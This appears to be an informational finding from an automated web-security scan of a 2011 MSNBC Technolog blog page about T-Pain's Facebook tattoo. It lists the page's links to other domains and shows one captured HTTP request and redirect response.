<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=c5942663&amp;rand=1003259490&amp;do=msnbc.redacted&amp;rf=http%3A%2F%2Fwww.redacted%2F&amp;ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>
...[SNIP]...
<li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a>
...[SNIP]...
<li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
...[SNIP]...
<li class="i7"><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li class="i9"><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li class="i18"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li class="i19"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li class="i20"><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="bing" class="i3 bing"><a href="http://www.bing.com"><span>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
           <li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a>
...[SNIP]...
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a>
...[SNIP]...
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a>
...[SNIP]...
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a>
...[SNIP]...
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...
<li class="email_subscribe_option"><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-email.png" width="19" height="18" alt="Icons Email"> Receive e-mail updates</a>
...[SNIP]...
</div><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted">change this</a>
...[SNIP]...
<div class="spinner hide"><img src="http://www.polls.newsvine.com/_vine/images/__/spinner.gif" width="16" height="16" alt="Loading" /> Saving...</div>
...[SNIP]...
<a href="http://technolog.msnbc.redacted/_feeds/rss2/author"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-feed.png" width="18" height="18" alt="Icons Feed"> Subscribe to RSS</a>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=button_count&amp;show_faces=false&amp;width=90&amp;action=like&amp;colorscheme=light&amp;href=http://www.facebook.com/pages/Technolog/108546889203630" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:90px; height:20px"></iframe>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
<div id="vine-inlinePhoto__5942669" data-contentId="5942669" class="inlinePhoto photo_portrait photo_align_block user_inline_photo" style="width:600px;"><img id="helenaspopkin/5942669.jpg" src="http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5942669.jpg" width="600" height="672" alt="" /><p class="photo_credit">
...[SNIP]...
<p>Anyhoo &hellip; T-Pain really likes Facebook too &hellip; at least his latest tattoo indicates such. The Grammy-winning hip-hop artist shared a picture of his new ink on Twitter today, <a href="http://twitter.com/#!/NBTPAIN/status/30855244816584704">with this explanation </a>
...[SNIP]...
<div id="vine-inlinePhoto__5942671" data-contentId="5942671" class="inlinePhoto photo_portrait photo_align_block user_inline_photo" style="width:238px;"><img id="helenaspopkin/5942671.jpg" src="http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5942671.jpg" width="238" height="320" alt="" /><!-- end5942671 -->
...[SNIP]...
</param><embed src="http://www.youtube.com/v/w0nFpwPuk8E&amp;hl=en_US&amp;fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="600" height="429"></embed>
...[SNIP]...
<em>Helen A.S. Popkin writes about the Internet ... a lot. Follow&nbsp;her on <a href="http://twitter.com/helenaspopkin"><span>
...[SNIP]...
</a> and/or <a href="http://www.facebook.com/pages/manage/#!/pages/Helen-AS-Popkin/120508047967128"><span>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore" data-Text="T-Pain's Facebook tattoo so hardcore, it's hexacore!">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div class="normal"><a href="http://biggie2221635.newsvine.com/">biggie-2221635</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="newsvine"><a href="http://tyler.newsvine.com/">tyler</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://waynej.newsvine.com/">waynejohn</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Davethedoubter.newsvine.com/">Dave the doubter</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://MInOTown.newsvine.com/">M In O Town</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://ljrhodes.newsvine.com/">L.J. Rhodes</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://John875667.newsvine.com/">John-875667</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Darthdon.newsvine.com/">Darthdon</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="privacytext"><a href="http://www.newsvine.com/_nv/cms/info/privacyPolicy" target="_blank">Newsvine Privacy Statement</a></div><img class="postCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_postcomment.gif" /><img class="postingCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_posting.gif" /></div>
...[SNIP]...
<div class="newuser">As a new user, you may notice a few temporary content restrictions. <a href="http://www.newsvine.com/_nv/cms/help/newUsers" target="_blank">Click here for more info</a>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_track_mini.gif" width="12" height="12" alt="Start Tracking" title="Add this article to your conversation tracker without commenting on it" />Start Tracking</span>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_stop_mini.gif" width="10" height="10" alt="Stop Tracking" />Stop Tracking</span>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="avatar"><a href="http://michaelwann.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/michaelwann-318009268.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/MichaelWann">Follow on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://technolog2.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/wjrothman-1049670252.jpg" width="60" height="60" /></a>
...[SNIP]...
from Time and the NYT to the notorious tech blog Gizmodo, where he was features editor for three years. He is not an Apple fanboy, but sometimes he is mistaken for one. You can stalk him on Twitter at <a href="http://twitter.com/wjrothman">@wjrothman</a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/wjrothman">Follow on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://helenaspopkin.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/helenaspopkin-1308146463.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/HelenASPopkin">Follow on Twitter</a>
...[SNIP]...
<li class="facebook"><a href="http://www.facebook.com/HelenASPopkin">Become a fan on Facebook</a>
...[SNIP]...
<div class="avatar"><a href="http://suzanne-choney.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/suzanne-choney-604078999.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="twitter"><a href="http://www.twitter.com/suzannechoney">Follow on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://alex-johnson.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/alex-johnson-743865123.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://malexj.wordpress.com/">Editor at Large</a>
...[SNIP]...
<li class="follow on twitter"><a href="http://www.twitter.com/MAlexJohnson">Follow on Twitter</a>
...[SNIP]...
<li class="follow on facebook"><a href="http://malexj.tk/6M">Follow on Facebook</a>
...[SNIP]...
<div class="avatar"><a href="http://redtape.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/redtape-920134022.jpg" width="60" height="60" /></a>
...[SNIP]...
<div class="avatar"><a href="http://boyle.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/boyle-747955448.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/badastronomy/">Bad Astronomy</a>
...[SNIP]...
<li><a href="http://www.collectspace.com/">CollectSpace</a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/cosmicvariance/">Cosmic Variance</a>
...[SNIP]...
<li><a href="http://curmudgeons.blogspot.com/">Curmudgeons Corner</a>
...[SNIP]...
<li><a href="http://news.discovery.com/">Discovery News</a>
...[SNIP]...
<li><a href="http://www.dailygrail.com/">The Daily Grail</a>
...[SNIP]...
<li><a href="http://earthsky.org/">EarthSky</a></li><li><a href="http://www.geekpress.com/">GeekPress</a></li><li><a href="http://www.habitablezone.com/space/">Habitable Zone</a>
...[SNIP]...
<li><a href="http://www.hobbyspace.com/">HobbySpace Log</a>
...[SNIP]...
<li><a href="http://www.livescience.com/">LiveScience</a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/loom/">The Loom</a></li><li><a href="http://www.nasawatch.com/">NASA Watch</a></li><li><a href="http://www.nasaspaceflight.com/">NASA Spaceflight</a>
...[SNIP]...
<li><a href="http://www.outofthecradle.net/">Out of the Cradle</a>
...[SNIP]...
<li><a href="http://www.scidev.net/">SciDev.net</a></li><li><a href="http://www.scienceblog.com/cms/index.php">Science Blog</a>
...[SNIP]...
<li><a href="http://www.scienceblogs.com/">ScienceBlogs</a>
...[SNIP]...
<li><a href="http://www.signonsandiego.com/news/blogs/science-quest/">Science Quest</a>
...[SNIP]...
<li><a href="http://www.scientificamerican.com/blog/observations/">SciAm Observations</a>
...[SNIP]...
<li><a href="http://seedmagazine.com/">Seed Magazine</a>
...[SNIP]...
<li><a href="http://science.slashdot.org">Slashdot Science</a>
...[SNIP]...
<li><a href="http://www.space.com/">Space.com</a></li><li><a href="http://www.spacedaily.com/">Spaceflight Now</a>
...[SNIP]...
<li><a href="http://spacefellowship.com/">Space Fellowship</a>
...[SNIP]...
<li><a href="http://www.thespacereview.com/">The Space Review</a>
...[SNIP]...
<li><a href="http://www.transterrestrial.com/">Transterrestrial Musings</a>
...[SNIP]...
<li><a href="http://http://www.universetoday.com/">Universe Today</a>
...[SNIP]...
<li><a href="http://www.unmannedspaceflight.com">Unmanned Spaceflight</a>
...[SNIP]...
<li><a href="http://trueslant.com/milesobrien/">Uplink by Miles O'Brien</a>
...[SNIP]...
<li><a href="http://planetary.org/blog">Planetary Society Blog</a>
...[SNIP]...
<li><a href="http://www.sciencenews.org/">Science News</a>
...[SNIP]...
<li><a href="http://www.popularmechanics.com/">Popular Mechanics</a>
...[SNIP]...
<li><a href="http://www.popsci.com/">Popular Science</a>
...[SNIP]...
<li><a href="http://news.sciencemag.org/scienceinsider/">Science Insider</a>
...[SNIP]...
<li><a href="http://nasaengineer.com/">NASAEngineer.com</a>
...[SNIP]...
<li><a href="http://eurekalert.org/">EurekAlert</a></li><li><a href="http://blogs.nature.com/news/thegreatbeyond/">Nature: The Great Beyond</a>
...[SNIP]...
<li><a href="http://www.spacedaily.com/">Space Daily</a>
...[SNIP]...
<li><a href="http://www.spacepolitics.com">Space Politics</a>
...[SNIP]...
<div class="rawhtml_contents clearer clearfix rawhtml_BlogAuthorPromo"><a href="http://www.thecaseforpluto.com/" title="The Case for Pluto"><img src="http://www.thecaseforpluto.com/cover.jpg" width="85" height="129" align="left" border="0" style="padding:0 10px 10px 0;" /></a>Alan Boyle's first book tells the story of Pluto's ups and downs as well as the discoveries of other dwarf planets in our own solar system and even more alien worlds beyond. <a href="http://www.thecaseforpluto.com/" title="The Case for Pluto">Buy "The Case for Pluto" ...</a>
...[SNIP]...
<div class="avatar"><a href="http://wbenedetti.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/WBenedetti-689965150.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="follow winda benedetti on twitter"><a href="http://twitter.com/windabenedetti">follow Winda Benedetti on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://toddkenreck.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/toddkenreck-1044151231.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://ingame.newsvine.com/">In-Game</a>
...[SNIP]...
<li class="todd kenreck on facebook"><a href="http://www.facebook.com/todd.kenreck">Todd Kenreck on facebook</a>
...[SNIP]...
<li class="todd kenreck on twitter"><a href="https://twitter.com/ToddKenreck">Todd Kenreck on twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://athima-chansanchai.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/athima-chansanchai-1539646533.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://redtape.msnbc.com/">Red Tape Chronicles</a>
...[SNIP]...
<a href="http://www.msnbc.redacted/"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/msnbc-logo.png" alt="msnbc.com" width="166" height="20"></a>
...[SNIP]...
<li>
                   <a href="http://privacy.microsoft.com/en-us/default.aspx?SU=http://msnbc.redacted/">MSN Privacy</a>
...[SNIP]...
<li>
                   <a href="http://help.live.com/help.aspx?project=tou&amp;mkt=en-us">Legal</a>
...[SNIP]...
</div><link rel="stylesheet" type="text/css" href="http://lib.newsvine.com/Pierre/widgets/wetbar/wetbar.css">
<script type="text/javascript" language="JavaScript">
...[SNIP]...

22.343. http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/?GT1=43001 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Location: http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore?GT1=43001
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 18:11:05 GMT
Connection: close

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog - T-Pain's Face
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="RSS" href="http://technolog.msnbc.redacted/_feeds/rss2/author" />
<link class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/e89cb27add8a8bec4ff014077d76236c84e0ee2e.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/895677dfabd5df38e5ee57c63c4a6f9ac2e2fff9.js?v=23247"></script>
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/base.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=c5942663&amp;rand=1043008822&amp;do=msnbc.redacted&amp;rf=http%3A%2F%2Fwww.redacted%2F&amp;ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>
...[SNIP]...
<li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a>
...[SNIP]...
<li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
...[SNIP]...
<li class="i7"><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li class="i9"><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li class="i18"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li class="i19"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li class="i20"><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="bing" class="i3 bing"><a href="http://www.bing.com"><span>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
           <li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a>
...[SNIP]...
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a>
...[SNIP]...
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a>
...[SNIP]...
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a>
...[SNIP]...
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...
<li class="email_subscribe_option"><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-email.png" width="19" height="18" alt="Icons Email"> Receive e-mail updates</a>
...[SNIP]...
</div><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted">change this</a>
...[SNIP]...
<div class="spinner hide"><img src="http://www.polls.newsvine.com/_vine/images/__/spinner.gif" width="16" height="16" alt="Loading" /> Saving...</div>
...[SNIP]...
<a href="http://technolog.msnbc.redacted/_feeds/rss2/author"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-feed.png" width="18" height="18" alt="Icons Feed"> Subscribe to RSS</a>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=button_count&amp;show_faces=false&amp;width=90&amp;action=like&amp;colorscheme=light&amp;href=http://www.facebook.com/pages/Technolog/108546889203630" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:90px; height:20px"></iframe>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
<div id="vine-inlinePhoto__5942669" data-contentId="5942669" class="inlinePhoto photo_portrait photo_align_block user_inline_photo" style="width:600px;"><img id="helenaspopkin/5942669.jpg" src="http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5942669.jpg" width="600" height="672" alt="" /><p class="photo_credit">
...[SNIP]...
<p>Anyhoo &hellip; T-Pain really likes Facebook too &hellip; at least his latest tattoo indicates such. The Grammy-winning hip-hop artist shared a picture of his new ink on Twitter today, <a href="http://twitter.com/#!/NBTPAIN/status/30855244816584704">with this explanation </a>
...[SNIP]...
<div id="vine-inlinePhoto__5942671" data-contentId="5942671" class="inlinePhoto photo_portrait photo_align_block user_inline_photo" style="width:238px;"><img id="helenaspopkin/5942671.jpg" src="http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5942671.jpg" width="238" height="320" alt="" /><!-- end5942671 -->
...[SNIP]...
</param><embed src="http://www.youtube.com/v/w0nFpwPuk8E&amp;hl=en_US&amp;fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="600" height="429"></embed>
...[SNIP]...
<em>Helen A.S. Popkin writes about the Internet ... a lot. Follow&nbsp;her on <a href="http://twitter.com/helenaspopkin"><span>
...[SNIP]...
</a> and/or <a href="http://www.facebook.com/pages/manage/#!/pages/Helen-AS-Popkin/120508047967128"><span>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore" data-Text="T-Pain's Facebook tattoo so hardcore, it's hexacore!">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div class="normal"><a href="http://biggie2221635.newsvine.com/">biggie-2221635</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="newsvine"><a href="http://tyler.newsvine.com/">tyler</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://waynej.newsvine.com/">waynejohn</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Davethedoubter.newsvine.com/">Dave the doubter</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://MInOTown.newsvine.com/">M In O Town</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://ljrhodes.newsvine.com/">L.J. Rhodes</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://John875667.newsvine.com/">John-875667</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Darthdon.newsvine.com/">Darthdon</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://aquatone.newsvine.com/">aquatone</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://zugg2.newsvine.com/">zugg</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
